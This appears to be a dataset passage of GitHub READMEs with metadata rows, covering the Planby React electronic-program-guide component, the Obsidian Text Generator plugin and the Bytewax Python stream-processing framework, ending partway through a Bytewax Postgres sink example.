<img src="https://raw.githubusercontent.com/karolkozer/planby-demo-resources/master/planby-planner-week.png" alt="Planby preview" />
</a>
</div>
<div align="center" style="margin-bottom: 10px">
<a href="https://planby.netlify.app/">
<img src="https://i.postimg.cc/50qZ05ST/planby-music-festival-event.png" alt="Planby preview" />
</a>
</div>
## Codesandbox example
[Live example - Codesandbox](https://codesandbox.io/s/5o3tsy)
[Live example - Typescript Codesandbox](https://codesandbox.io/s/planby-epg-demo-ts-lp66v5)
[Live example - website with control panel](https://planby.netlify.app/)
## Testimonials
<div align="center" >
<a href="https://planby.netlify.app/#testimonials">
<img src="https://raw.githubusercontent.com/karolkozer/planby-demo-resources/master/they-use-planby.png" alt="Planby preview" />
</a>
</div>
<div align="center" style="margin-bottom: 10px">
<a href="https://planby.netlify.app/#testimonials">
<img src="https://raw.githubusercontent.com/karolkozer/planby-demo-resources/master/testimonials.png" alt="Planby preview" />
</a>
</div>
## 🚀 [Become a Sponsor!](https://opencollective.com/planby) 🚀
Become a sponsor, support, and help us in continuing our development. -> [Opencollective](https://opencollective.com/planby)
## Getting Started
### Installation
- yarn
```sh
yarn add planby
```
- npm
```sh
npm install planby
```
## Usage
```tsx
import { useEpg, Epg, Layout } from 'planby';
const channels = React.useMemo(
() => [
{
logo: 'https://via.placeholder.com',
uuid: '10339a4b-7c48-40ab-abad-f3bcaf95d9fa',
...
},
],
[]
);
const epg = React.useMemo(
() => [
{
channelUuid: '30f5ff1c-1346-480a-8047-a999dd908c1e',
description:
'Ut anim nisi consequat minim deserunt...',
id: 'b67ccaa3-3dd2-4121-8256-33dbddc7f0e6',
image: 'https://via.placeholder.com',
since: "2022-02-02T23:50:00",
till: "2022-02-02T00:55:00",
title: 'Title',
...
},
],
[]
);
const {
getEpgProps,
getLayoutProps,
onScrollToNow,
onScrollLeft,
onScrollRight,
} = useEpg({
epg,
channels,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
});
return (
<div>
<div style={{ height: '600px', width: '1200px' }}>
<Epg {...getEpgProps()}>
<Layout
{...getLayoutProps()}
/>
</Epg>
</div>
</div>
);
```
or
#### Custom width and height
```tsx
const {
getEpgProps,
getLayoutProps,
...
} = useEpg({
epg,
channels,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
width: 1200,
height: 600
});
return (
<div>
<Epg {...getEpgProps()}>
<Layout
{...getLayoutProps()}
/>
</Epg>
</div>
```
or
#### Time range
```tsx
const {
getEpgProps,
getLayoutProps,
...
} = useEpg({
epg,
channels,
startDate: '2022-02-02T10:00:00',
endDate: '2022-02-02T20:00:00',
width: 1200,
height: 600
});
return (
<div>
<Epg {...getEpgProps()}>
<Layout
{...getLayoutProps()}
/>
</Epg>
</div>
```
## API
### useEpg
#### Options
Available options in useEpg
| Property | Type | Status | Description | Access |
| ------------------------ | --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------ |
| `channels` | `array` | required | Array with channels data | |
| `epg` | `array` | required | Array with EPG data | |
| `width` | `number` | optional | EPG width | |
| `height` | `number` | optional | EPG height | |
| `sidebarWidth` | `number` | optional | Width of the sidebar with channels | |
| `timelineHeight` | `number` | optional | Height of the timeline | `PRO` |
| `itemHeight` | `number` | optional | Height of channels and programs in the EPG. Default value is 80 | |
| `dayWidth` | `number` | optional | Width of the day. Default value is 7200. Calculation to set up day width with own hour width value e.g., 24h \* 300px (your custom hour width) = 7200px -> `dayWidth` | |
| `startDate` | `string` | optional | Date format `2022/02/02` or `2022-02-02T00:00:00`. You can set your own start time, e.g., `2022-02-02T10:00:00`, `2022-02-02T14:00:00`, etc. Full clock hours only | |
| `endDate` | `string` | optional | Date format `2022-02-02T00:00:00`, `2022-02-02T20:00:00`, etc. Must be within the same 24-hour period as `startDate`. Full clock hours only. Scroll through `multiple days` and timeline mode is available only in `PRO` plan. | `PRO` |
| `hoursInDays` | `array` | optional | Set start time and end time of each day in `multiple days` feature if your data for each day has some time spaces between items in the day. | `PRO` |
| `initialScrollPositions` | `object` | optional | Set initial scroll position in Layout, e.g., `initialScrollPositions: { top: 500, left: 800 }` | `PRO` |
| `liveRefreshTime` | `number` | optional | Live refresh time of the events. Default value is 120 sec. | `PRO` |
| `isBaseTimeFormat` | `boolean` | optional | Convert to 12-hour format, e.g., `2:00am`, `4:00pm`, etc. Default value is false. | |
| `isCurrentTime` | `boolean` | optional | Show current time in Timeline. Default value is false. | `PRO` |
| `isInitialScrollToNow` | `boolean` | optional | Scroll to the current live element. | `PRO` |
| `isVerticalMode` | `boolean` | optional | Show Timeline in vertical view. Default value is false. | `PRO` |
| `isResize` | `boolean` | optional | Possibility to resize the element. | `PRO` |
| `isSidebar` | `boolean` | optional | Show/hide sidebar | |
| `isTimeline` | `boolean` | optional | Show/hide timeline | |
| `isLine` | `boolean` | optional | Show/hide line | |
| `isRTL` | `boolean` | optional | Change direction to RTL or LTR. Default value is false. | `PRO` |
| `theme` | `object` | optional | Object with theme schema | |
| `timezone` | `object` | optional | Convert and display data from UTC format to your own time zone | `PRO` |
| `areas` | `array` | optional | Areas give you the possibility to add field ranges to the Timeline layout. | `PRO` |
| `mode` | `object` | optional | Type values: `day/week/month`. Style values: `default/modern` Define the mode and style of the timeline. Default mode is `day` and style is `default` | `PRO` |
| `overlap` | `object` | optional | Enable the element overlaps in the layout. Mode values: `stack/layer`, layerOverlapLevel: `number` | `PRO` |
| `drag and drop` | `object` | optional | Drag and move the element in the layout. Mode values: `row/multi-rows` | `PRO` |
| `grid layout` | `object` | optional | Background grid on the layout. Mode hoverHighlight values: `true/false`, onGridItemClick: function with all the properties on clicked item grid | `PRO` |
| `channelMapKey` | `string` | optional | The Channel `uuid` attribute can be controlled by this prop. The key map gives you the possibility to use a specific prop from your own data instead of needing to map it to `uuid` in your data | `PRO` |
| `programChannelMapKey` | `string` | optional | The Program `channelUuid` attribute can be controlled by this prop. The key map gives you the possibility to use a specific prop from your own data instead of needing to map it to `channelUuid` in your data | `PRO` |
| `globalStyles` | `string` | optional | Inject custom global styles and font. Font weight: 400,500,600. Default font is "Inter" | `PRO` |
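As a quick reference, here is a minimal sketch (not a definitive configuration) that combines several of the basic, non-`PRO` options from the table above into a single `useEpg` call; the concrete values (sidebar width, item height, etc.) are illustrative only, and `epg`, `channels`, and `theme` are assumed to be defined as in the Usage and Theme sections.
```tsx
const { getEpgProps, getLayoutProps } = useEpg({
  epg,
  channels,
  startDate: '2022-02-02T00:00:00',
  width: 1200,
  height: 600,
  sidebarWidth: 100, // width of the channels sidebar (illustrative value)
  itemHeight: 80, // default is 80
  dayWidth: 7200, // 24h * 300px per hour
  isBaseTimeFormat: true, // 12-hour clock, e.g. 2:00am / 4:00pm
  isSidebar: true,
  isTimeline: true,
  isLine: true,
  theme, // optional theme object, see the Theme section below
});
```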
#### Note about width and height props
Without declaring the `width` and `height` properties, the component takes the dimensions of the parent element.
#### globalStyles
Inject own custom font and other global styles.
```tsx
const globalStyles = `
@import url("https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600&display=swap");
/* Available in PRO plan */
.planby {
font-family: "Inter", system-ui, -apple-system, "Segoe UI", Roboto, Helvetica,
Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji";
/* Layout */
.planby-layout {}
/* Line */
.planby-line {}
/* Current time */
.planby-current-time {}
.planby-current-content {}
/* Channels */
.planby-channels {}
/* Channel */
.planby-channel {}
/* Program */
.planby-program {}
.planby-program-content {}
.planby-program-flex {}
.planby-program-stack {}
.planby-program-title {}
.planby-program-text {}
/* Timeline */
.planby-timeline-wrapper {}
.planby-timeline-box {}
.planby-timeline-time {}
.planby-timeline-dividers {}
.planby-timeline-wrapper {}
}
`;
```
#### Instance Properties
Properties returned from useEpg
| Property | Type | Description |
| --------------- | ------------------------- | ------------------------------------ |
| `scrollY` | `number` | Current scroll y value |
| `scrollX` | `number` | Current scroll x value |
| `onScrollLeft` | `function(value: number)` | Default value is 300 |
| `onScrollRight` | `function(value: number)` | Default value is 300 |
| `onScrollToNow` | `function()` | Scroll to current time/live programs |
| `onScrollTop` | `function(value: number)` | Default value is 300 |
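As a minimal sketch (not a definitive implementation), the instance properties above can be wired to simple controls; this assumes the default scroll step of 300 applies when the scroll functions are called without an argument.
```tsx
const {
  getEpgProps,
  getLayoutProps,
  onScrollToNow,
  onScrollLeft,
  onScrollRight,
} = useEpg({ epg, channels, startDate: '2022/02/02' });

return (
  <div>
    {/* Simple scroll controls built from the instance properties */}
    <button onClick={() => onScrollToNow()}>Now</button>
    <button onClick={() => onScrollLeft()}>Scroll left</button>
    <button onClick={() => onScrollRight()}>Scroll right</button>
    <div style={{ height: '600px', width: '1200px' }}>
      <Epg {...getEpgProps()}>
        <Layout {...getLayoutProps()} />
      </Epg>
    </div>
  </div>
);
```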
### Channel schema
| Property | Type | Status |
| -------- | -------- | -------- |
| `logo` | `string` | required |
| `uuid` | `string` | required |
### Epg schema
| Property | Type | Status | Description | Access |
| ----------------- | --------- | -------- | -------------------------------------------------------------------- | -------- |
| `channelUuid` | `string` | required |
| `id` | `string` | required |
| `image` | `string` | required |
| `since` | `string` | required |
| `till` | `string` | required |
| `title` | `string` | required |
| `fixedVisibility` | `boolean` | optional | The element is always visible in the layout during the scroll events | Sponsors |
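For reference, here is a minimal sketch of data objects that satisfy both schemas above; all values are placeholders taken from the Usage example.
```tsx
const channels = [
  {
    uuid: '30f5ff1c-1346-480a-8047-a999dd908c1e', // required
    logo: 'https://via.placeholder.com', // required
  },
];

const epg = [
  {
    id: 'b67ccaa3-3dd2-4121-8256-33dbddc7f0e6', // required
    channelUuid: '30f5ff1c-1346-480a-8047-a999dd908c1e', // required, must match a channel uuid
    title: 'Title', // required
    image: 'https://via.placeholder.com', // required
    since: '2022-02-02T00:00:00', // required
    till: '2022-02-02T00:55:00', // required
  },
];
```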
### Epg
#### Base props
Available props in Epg
| Property | Type | Description | Status |
| ----------- | ----------- | ----------------------- | -------- |
| `isLoading` | `boolean` | Loader state | optional |
| `loader` | `Component` | Loader custom component | optional |
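A minimal sketch of how these props might be passed, assuming you track an `isLoading` flag while fetching EPG data and provide your own `CustomLoader` component (both names are hypothetical, not part of Planby):
```tsx
// Pass the loading state and a custom loader alongside the props from useEpg
<Epg {...getEpgProps()} isLoading={isLoading} loader={<CustomLoader />}>
  <Layout {...getLayoutProps()} />
</Epg>
```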
### Layout
#### Base props
Available props in Layout.
| Property | Type | Description | Status | Access |
| ------------------- | ------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------- | -------- | ---------- |
| `renderProgram` | `function({ program: { data: object, position: object})` | `data` object contains all properties related to the program, `position` object includes all position styles | optional |
| `renderChannel` | `function({ channel: { ..., position: object})` | `channel` object contains all properties related to the channel, `position` object includes all position styles | optional |
| `renderTimeline` | `function({sidebarWidth: number})` | `sidebarWidth` value of the channel's sidebar width | optional |
| `renderLine` | `function({styles: object})` | basic `styles` and `position` values for the custom live tracking Line | optional | `Sponsors` |
| `renderCurrentTime` | `function({styles: object, isRTL: boolean, isBaseTimeFormat: boolean, time: string})` | basic `styles` values for the custom current time | optional | `Sponsors` |
# Render functions
You can use Planby's style components to develop the main features. Moreover, you can integrate with third-party UI libraries, e.g. Chakra UI, Material UI, etc., or create custom styles.
## renderProgram
Below is an example that allows you to render your custom Program component using Planby's style components.
```tsx
import {
useEpg,
Epg,
Layout,
ProgramBox,
ProgramContent,
ProgramFlex,
ProgramStack,
ProgramTitle,
ProgramText,
ProgramImage,
useProgram,
Program,
ProgramItem
} from "planby";
const Item = ({ program,...rest }: ProgramItem) => {
const { styles, formatTime, isLive, isMinWidth } = useProgram({ program,...rest });
const { data } = program;
const { image, title, since, till } = data;
const sinceTime = formatTime(since);
const tillTime = formatTime(till);
return (
<ProgramBox width={styles.width} style={styles.position}>
<ProgramContent
width={styles.width}
isLive={isLive}
>
<ProgramFlex>
{isLive && isMinWidth && <ProgramImage src={image} alt="Preview" />}
<ProgramStack>
<ProgramTitle>{title}</ProgramTitle>
<ProgramText>
{sinceTime} - {tillTime}
</ProgramText>
</ProgramStack>
</ProgramFlex>
</ProgramContent>
</ProgramBox>
);
};
function App() {
...
const {
getEpgProps,
getLayoutProps,
} = useEpg({
epg,
channels,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
});
return (
<div>
<div style={{ height: '600px', width: '1200px' }}>
<Epg {...getEpgProps()}>
<Layout
{...getLayoutProps()}
renderProgram={({ program,...rest }) => (
<Item key={program.data.id} program={program} {...rest} />
)}
/>
</Epg>
</div>
</div>
);
}
export default App;
```
## renderProgram - 12 hours time format
Below is an example that allows you to render your custom Program component with a 12-hour time format using Planby's style components.
```tsx
...
const Item = ({ program, ...rest }: ProgramItem) => {
const {
styles,
formatTime,
set12HoursTimeFormat,
isLive,
isMinWidth,
} = useProgram({
program,
...rest
});
const { data } = program;
const { image, title, since, till } = data;
const sinceTime = formatTime(since, set12HoursTimeFormat()).toLowerCase();
const tillTime = formatTime(till, set12HoursTimeFormat()).toLowerCase();
return (
<ProgramBox width={styles.width} style={styles.position}>
<ProgramContent
width={styles.width}
isLive={isLive}
>
<ProgramFlex>
{isLive && isMinWidth && <ProgramImage src={image} alt="Preview" />}
<ProgramStack>
<ProgramTitle>{title}</ProgramTitle>
<ProgramText>
{sinceTime} - {tillTime}
</ProgramText>
</ProgramStack>
</ProgramFlex>
</ProgramContent>
</ProgramBox>
);
};
function App() {
...
const {
getEpgProps,
getLayoutProps,
} = useEpg({
epg,
channels,
isBaseTimeFormat: true,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
});
...
}
export default App;
```
## renderProgram - RTL direction
Below is an example that allows you to render your custom Program component with RTL direction using Planby's style components.
```tsx
...
const Item = ({ program, ...rest }: ProgramItem) => {
const {
isRTL,
isLive,
isMinWidth,
formatTime,
styles,
set12HoursTimeFormat,
getRTLSinceTime,
getRTLTillTime,
} = useProgram({
program,
...rest
});
const { data } = program;
const { image, title, since, till } = data;
const sinceTime = formatTime(
getRTLSinceTime(since),
set12HoursTimeFormat()
).toLowerCase();
const tillTime = formatTime(
getRTLTillTime(till),
set12HoursTimeFormat()
).toLowerCase();
return (
<ProgramBox width={styles.width} style={styles.position}>
<ProgramContent width={styles.width} isLive={isLive}>
<ProgramFlex>
{isLive && isMinWidth && <ProgramImage src={image} alt="Preview" />}
<ProgramStack isRTL={isRTL}>
<ProgramTitle>{title}</ProgramTitle>
<ProgramText>
{sinceTime} - {tillTime}
</ProgramText>
</ProgramStack>
</ProgramFlex>
</ProgramContent>
</ProgramBox>
);
};
function App() {
...
const {
getEpgProps,
getLayoutProps,
} = useEpg({
epg,
channels,
isBaseTimeFormat: true,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
});
...
}
export default App;
```
## renderChannel
Below is an example that allows you to render your custom Channel component using Planby's style components.
```tsx
import { useEpg, Epg, Layout, ChannelBox, ChannelLogo, Channel } from 'planby';
interface ChannelItemProps {
channel: Channel;
}
const ChannelItem = ({ channel }: ChannelItemProps) => {
const { position, logo } = channel;
return (
<ChannelBox {...position}>
<ChannelLogo
onClick={() => console.log('channel', channel)}
src={logo}
alt="Logo"
/>
</ChannelBox>
);
};
function App() {
...
const {
getEpgProps,
getLayoutProps,
} = useEpg({
epg,
channels,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
});
return (
<div>
<div style={{ height: '600px', width: '1200px' }}>
<Epg {...getEpgProps()}>
<Layout
{...getLayoutProps()}
renderChannel={({ channel }) => (
<ChannelItem key={channel.uuid} channel={channel} />
)}
/>
</Epg>
</div>
</div>
);
}
```
## renderTimeline
Below is an example that allows you to render your custom Timeline component using Planby's style components.
```tsx
import {
TimelineWrapper,
TimelineBox,
TimelineTime,
TimelineDivider,
TimelineDividers,
useTimeline,
} from 'planby';
interface TimelineProps {
isBaseTimeFormat: boolean;
isSidebar: boolean;
dayWidth: number;
hourWidth: number;
numberOfHoursInDay: number;
offsetStartHoursRange: number;
sidebarWidth: number;
}
export function Timeline({
isBaseTimeFormat,
isSidebar,
dayWidth,
hourWidth,
numberOfHoursInDay,
offsetStartHoursRange,
sidebarWidth,
}: TimelineProps) {
const { time, dividers, formatTime } = useTimeline(
numberOfHoursInDay,
isBaseTimeFormat
);
const renderTime = (index: number) => (
<TimelineBox key={index} width={hourWidth}>
<TimelineTime>
{formatTime(index + offsetStartHoursRange).toLowerCase()}
</TimelineTime>
<TimelineDividers>{renderDividers()}</TimelineDividers>
</TimelineBox>
);
const renderDividers = () =>
dividers.map((_, index) => (
<TimelineDivider key={index} width={hourWidth} />
));
return (
<TimelineWrapper
dayWidth={dayWidth}
sidebarWidth={sidebarWidth}
isSidebar={isSidebar}
>
{time.map((_, index) => renderTime(index))}
</TimelineWrapper>
);
}
function App() {
...
const {
getEpgProps,
getLayoutProps,
} = useEpg({
epg,
channels,
startDate: '2022/02/02', // or 2022-02-02T00:00:00
});
return (
<div>
<div style={{ height: '600px', width: '1200px' }}>
<Epg {...getEpgProps()}>
<Layout
{...getLayoutProps()}
renderTimeline={(props) => <Timeline {...props} />}
/>
</Epg>
</div>
</div>
);
}
export default App;
```
## renderTimeline - RTL direction
Below is an example that allows you to render your custom Timeline component with RTL direction using Planby's style components.
```tsx
import {
TimelineWrapper,
TimelineBox,
TimelineTime,
TimelineDivider,
TimelineDividers,
useTimeline,
} from 'planby';
interface TimelineProps {
isRTL: boolean;
isBaseTimeFormat: boolean;
isSidebar: boolean;
dayWidth: number;
hourWidth: number;
numberOfHoursInDay: number;
offsetStartHoursRange: number;
sidebarWidth: number;
}
export function Timeline({
isRTL,
isBaseTimeFormat,
isSidebar,
dayWidth,
hourWidth,
numberOfHoursInDay,
offsetStartHoursRange,
sidebarWidth,
}: TimelineProps) {
const { time, dividers, formatTime } = useTimeline(
numberOfHoursInDay,
isBaseTimeFormat
);
const renderTime = (index: number) => (
<TimelineBox key={index} width={hourWidth}>
<TimelineTime isBaseTimeFormat={isBaseTimeFormat} isRTL={isRTL}>
{formatTime(index + offsetStartHoursRange).toLowerCase()}
</TimelineTime>
<TimelineDividers>{renderDividers()}</TimelineDividers>
</TimelineBox>
);
...
}
```
## Theme
### Schema
Customise your own theme. Below is the theme schema that you can pass as one of the options to the `useEpg` hook.
```jsx
const theme = {
primary: {
600: '#1a202c',
900: '#171923',
},
grey: { 300: '#d1d1d1' },
white: '#fff',
green: {
300: '#2C7A7B',
},
loader: {
teal: '#5DDADB',
purple: '#3437A2',
pink: '#F78EB6',
bg: '#171923db',
},
scrollbar: {
border: '#ffffff',
thumb: {
bg: '#e1e1e1',
},
},
gradient: {
blue: {
300: '#002eb3',
600: '#002360',
900: '#051937',
},
},
text: {
grey: {
300: '#a0aec0',
500: '#718096',
},
},
timeline: {
divider: {
bg: '#718096',
},
},
};
```
## All import options
```tsx
import {
Epg,
Layout,
ChannelBox,
ChannelLogo,
ProgramBox,
ProgramContent,
ProgramFlex,
ProgramStack,
ProgramTitle,
ProgramText,
ProgramImage,
TimelineWrapper,
TimelineBox,
TimelineTime,
TimelineDividers,
useEpg,
useProgram,
useTimeline,
Program, // Interface
Channel, // Interface
ProgramItem, // Interface for program render
Theme, // Interface
} from 'planby';
```
## License
Custom License - All Rights Reserved. [See `LICENSE` for more information](https://planby.app/docs/planby-license.pdf).
## Contact
Karol Kozer - [@kozerkarol_twitter](https://twitter.com/kozerkarol)
Project Link: [https://github.com/karolkozer/planby](https://github.com/karolkozer/planby)
| null | epg,schedule,harmonogram,eletronic,program,guide,react,component,hooks,web | 16 | 3 | 7 | 128 | 3 | 17 | 0 |
nhaouari/obsidian-textgenerator-plugin | <h1 align="center">obsidian-textgenerator-plugin</h1>
<div align="center">
<a href="https://bit.ly/3ORwT00">Documentation</a>
<span> • </span>
<a href="https://discord.gg/BRYqetyjag">Discord</a>
<span> • </span>
<a href="https://twitter.com/intent/follow?screen_name=TextGenPlugin">Twitter</a>
<br />
<br />
<br />
</div>
## What is Text Generator?
**Text Generator** is an open-source AI Assistant Tool that brings the power of Generative Artificial Intelligence to knowledge creation and organization in Obsidian.
For example, use Text Generator to generate ideas, attractive titles, summaries, outlines, and whole paragraphs based on your knowledge database.
The possibilities are endless!
If you're looking for a place to discuss the use cases of this plugin and share your experiences, head over to our [**Discord Server (Updated)**](https://discord.gg/BRYqetyjag) or the [Discussion](https://github.com/nhaouari/obsidian-textgenerator-plugin/discussions/categories/use-cases). There, you'll find a community of like-minded users who are eager to help you make the most of this powerful tool.
## Features
There are many benefits to using a Text Generator Plugin, including the following:
- **Free and Open Source**: The Text Generator Plugin is free and open source, so you can use it without worrying about licensing fees.
- **Beside Obsidian**: Obsidian is a very powerful and extensible Personal Knowledge Management software, so you can use the Text Generator Plugin alongside Obsidian to create an even more powerful Personal Knowledge Management system.
- **Flexible Prompts**: Building the context of a prompt is straightforward using all the available options in the Considered Context, which gives you greater flexibility.
- **Template Engine**: You can create templates to make repetitive tasks more manageable.
- **Community Templates**: Through this option you can discover new use cases of Generative Artificial Intelligence via the shared templates, and you can share your own use cases more easily.
- **Highly Flexible Configuration**: Using Frontmatter Configuration, it is possible to use different services such as Google Generative AI (which includes `Gemini-Pro`), OpenAI, HuggingFace, etc.
## Demonstration
[![Youtube Demonstration](https://img.youtube.com/vi/OergqWCdFKc/0.jpg)](https://www.youtube.com/watch?v=OergqWCdFKc)
| Text generator is a handy plugin for Obsidian that helps you generate text content using GPT-3 (OpenAI). | obsidian,obsidian-plugin,plugin,gpt-3,huggingface,nlg,openai,ai,writing,writing-tool | 149 | 17 | 33 | 953 | 30 | 2 | 2 |
bytewax/bytewax | [![Actions Status](https://github.com/bytewax/bytewax/workflows/CI/badge.svg)](https://github.com/bytewax/bytewax/actions)
[![PyPI](https://img.shields.io/pypi/v/bytewax.svg?style=flat-square)](https://pypi.org/project/bytewax/)
[![Bytewax User Guide](https://img.shields.io/badge/user-guide-brightgreen?style=flat-square)](https://docs.bytewax.io/stable/guide/index.html)
<picture>
<source media="(prefers-color-scheme: dark)" srcset="https://github.com/bytewax/bytewax/assets/53014647/cd47293b-72c9-423c-b010-2c4990206c60" width="350">
<source media="(prefers-color-scheme: light)" srcset="https://github.com/bytewax/bytewax/assets/53014647/f376c9e8-5bd4-4563-ba40-3df8761b13fc" width="350">
<img alt="Bytewax">
</picture>
## Python Stateful Stream Processing Framework
Bytewax is a Python framework that simplifies event and stream processing. Because Bytewax couples the stream and event processing capabilities of Flink, Spark, and Kafka Streams with the friendly and familiar interface of Python, you can re-use the Python libraries you already know and love. Connect data sources, run stateful transformations, and write to various downstream systems with built-in connectors or existing Python libraries.
<img width="1303" alt="Bytewax Dataflow Animation" src="https://github.com/bytewax/bytewax/assets/156834296/4e314f17-38ab-4e72-9268-a48ddee7a201">
### How it all works
Bytewax is a Python framework and Rust-based distributed processing engine that uses a dataflow computational model to provide parallelizable stream and event processing capabilities similar to Flink, Spark, and Kafka Streams. You can use Bytewax for a variety of workloads, from moving data à la Kafka Connect all the way to advanced online machine learning. Bytewax is not limited to streaming applications; it excels anywhere that data can be distributed at the input and output.
Bytewax has an accompanying command line interface, [waxctl](https://docs.bytewax.io/stable/guide/deployment/waxctl.html), which supports the deployment of dataflows on cloud servers or Kubernetes. You can download it [here](https://bytewax.io/waxctl).
---
### Getting Started with Bytewax
```sh
pip install bytewax
```
[_Install waxctl_](https://bytewax.io/waxctl)
#### Dataflow, Input and Operators
A Bytewax dataflow is Python code that will represent an input, a series of processing steps, and an output. The inputs could range from a Kafka stream to a WebSocket and the outputs could vary from a data lake to a key-value store.
```python
import json
from bytewax import operators as op
from bytewax.connectors.kafka import KafkaSinkMessage, operators as kop
from bytewax.dataflow import Dataflow
```
Bytewax has input and output helpers for common input and output data sources but you can also create your own with the [Sink and Source API](https://docs.bytewax.io/stable/guide/advanced-concepts/custom-connectors.html).
At a high level, the dataflow compute model is one in which a program execution is conceptualized as data flowing through a series of operator-based steps. Operators like `map` and `filter` are the processing primitives of Bytewax. Each of them gives you a “shape” of data transformation, and you give them regular Python functions to customize them to the specific task you need. See the documentation for a list of the [available operators](https://docs.bytewax.io/stable/api/bytewax/bytewax.operators.html).
```python
BROKERS = ["localhost:19092"]
IN_TOPICS = ["in_topic"]
OUT_TOPIC = "out_topic"
ERR_TOPIC = "errors"
def deserialize(kafka_message):
return json.loads(kafka_message.value)
def anonymize_email(event_data):
event_data["email"] = "@".join(["******", event_data["email"].split("@")[-1]])
return event_data
def remove_bytewax(event_data):
return "bytewax" not in event_data["email"]
flow = Dataflow("kafka_in_out")
stream = kop.input("inp", flow, brokers=BROKERS, topics=IN_TOPICS)
# we can inspect the stream coming from the kafka topic to view the items within on std out for debugging
op.inspect("inspect-oks", stream.oks)
# we can also inspect kafka errors as a separate stream and raise an exception when one is encountered
errs = op.inspect("errors", stream.errs).then(op.raises, "crash-on-err")
deser_msgs = op.map("deserialize", stream.oks, deserialize)
anon_msgs = op.map("anon", deser_msgs, anonymize_email)
filtered_msgs = op.filter("filter_employees", anon_msgs, remove_bytewax)
processed = op.map("map", filtered_msgs, lambda m: KafkaSinkMessage(None, json.dumps(m)))
# and finally output the cleaned data to a new topic
kop.output("out1", processed, brokers=BROKERS, topic=OUT_TOPIC)
```
#### Windowing, Reducing and Aggregating
Bytewax is a stateful stream processing framework, which means that some operations remember information across multiple events. Windows and aggregations are also stateful, and can be reconstructed in the event of failure. Bytewax can be configured with different [state recovery mechanisms](https://docs.bytewax.io/stable/api/bytewax/bytewax.recovery.html) to durably persist state in order to recover from failure.
There are multiple stateful operators available like `reduce`, `stateful_map` and `fold_window`. The complete list can be found in the [API documentation for all operators](https://docs.bytewax.io/stable/api/bytewax/bytewax.operators.html). Below we use the `collect_window` operator with an event-time clock and a tumbling window to gather events into five-second buckets and calculate the average value per bucket on a per-user basis.
```python
from datetime import datetime, timedelta, timezone
from bytewax import operators as op
from bytewax.dataflow import Dataflow
import bytewax.operators.windowing as win
from bytewax.operators.windowing import EventClock, TumblingWindower
from bytewax.testing import TestingSource
flow = Dataflow("window_eg")
src = [
{"user_id": "123", "value": 5, "time": "2023-1-1T00:00:00Z"},
{"user_id": "123", "value": 7, "time": "2023-1-1T00:00:01Z"},
{"user_id": "123", "value": 2, "time": "2023-1-1T00:00:07Z"},
]
inp = op.input("inp", flow, TestingSource(src))
keyed_inp = op.key_on("keyed_inp", inp, lambda x: x["user_id"])
# This function instructs the event clock on how to retrieve the
# event's datetime from the input.
# Note that the datetime MUST be UTC. If the datetime is using a different
# representation, we would have to convert it here.
def get_event_time(event):
return datetime.fromisoformat(event["time"])
# Configure the `fold_window` operator to use the event time.
clock = EventClock(get_event_time, wait_for_system_duration=timedelta(seconds=10))
# And a 5 seconds tumbling window
align_to = datetime(2023, 1, 1, tzinfo=timezone.utc)
windower = TumblingWindower(align_to=align_to, length=timedelta(seconds=5))
five_sec_buckets_win_out = win.collect_window(
"five_sec_buckets", keyed_inp, clock, windower
)
def calc_avg(bucket):
values = [event["value"] for event in bucket]
if len(values) > 0:
return sum(values) / len(values)
else:
return None
five_sec_avgs = op.map_value("avg_in_bucket", five_sec_buckets_win_out.down, calc_avg)
```
#### Merges and Joins
Merging or joining multiple input streams is a common task in stream processing. Bytewax enables different types of joins to facilitate different patterns.
##### Merging Streams
Merging streams is like concatenation: there is no join logic, and the resulting stream will potentially include heterogeneous records.
```python
from bytewax import operators as op
from bytewax.connectors.stdio import StdOutSink
from bytewax.dataflow import Dataflow
from bytewax.testing import TestingSource
flow = Dataflow("merge")
src_1 = [
{"user_id": "123", "name": "Bumble"},
]
inp1 = op.input("inp1", flow, TestingSource(src_1))
src_2 = [
{"user_id": "123", "email": "bee@bytewax.com"},
{"user_id": "456", "email": "hive@bytewax.com"},
]
inp2 = op.input("inp2", flow, TestingSource(src_2))
merged_stream = op.merge("merge", inp1, inp2)
op.inspect("debug", merged_stream)
```
##### Joining Streams
Joining streams is different from merging because it uses logic to join the records in the streams together. The joins in Bytewax can be running or not. A regular join in streaming is closely related to an inner join in SQL, in that the dataflow will emit data downstream from a join when all of the sides of the join have matched on the key.
```python
from bytewax import operators as op
from bytewax.connectors.stdio import StdOutSink
from bytewax.dataflow import Dataflow
from bytewax.testing import TestingSource
flow = Dataflow("join")
src_1 = [
{"user_id": "123", "name": "Bumble"},
]
inp1 = op.input("inp1", flow, TestingSource(src_1))
keyed_inp_1 = op.key_on("key_stream_1", inp1, lambda x: x["user_id"])
src_2 = [
{"user_id": "123", "email": "bee@bytewax.com"},
{"user_id": "456", "email": "hive@bytewax.com"},
]
inp2 = op.input("inp2", flow, TestingSource(src_2))
keyed_inp_2 = op.key_on("key_stream_2", inp2, lambda x: x["user_id"])
merged_stream = op.join("join", keyed_inp_1, keyed_inp_2)
op.inspect("debug", merged_stream)
```
#### Output
Output in Bytewax is described as a sink and these are grouped into [connectors](https://docs.bytewax.io/stable/api/bytewax/bytewax.connectors.html). There are a number of basic connectors in the Bytewax repo to help you during development. In addition to the built-in connectors, it is possible to use the input and output API to build a custom sink and source. There is also a hub for connectors built by the community, partners and Bytewax. Below is an example of a custom connector for Postgres using the psycopg2 library.
```python
import psycopg2
from psycopg2.extras import execute_values
from bytewax import operators as op
from bytewax.outputs import FixedPartitionedSink, StatefulSinkPartition
class PsqlSink(StatefulSinkPartition):
def __init__(self):
self.conn = psycopg2.connect("dbname=website user=bytewax")
self.conn.set_session(autocommit=True)
self.cur = self.conn.cursor()
    def write_batch(self, values):
        # `values` is a list of rows to upsert in a single batch.
        query_string = """
            INSERT INTO events (user_id, data)
            VALUES %s
            ON CONFLICT (user_id)
            DO UPDATE SET data = EXCLUDED.data;
        """
        execute_values(self.cur, query_string, values)
def snapshot(self):
pass
def close(self):
self.conn.close()
class PsqlOutput(FixedPartitionedSink):
def list_parts(self):
return ["single"]
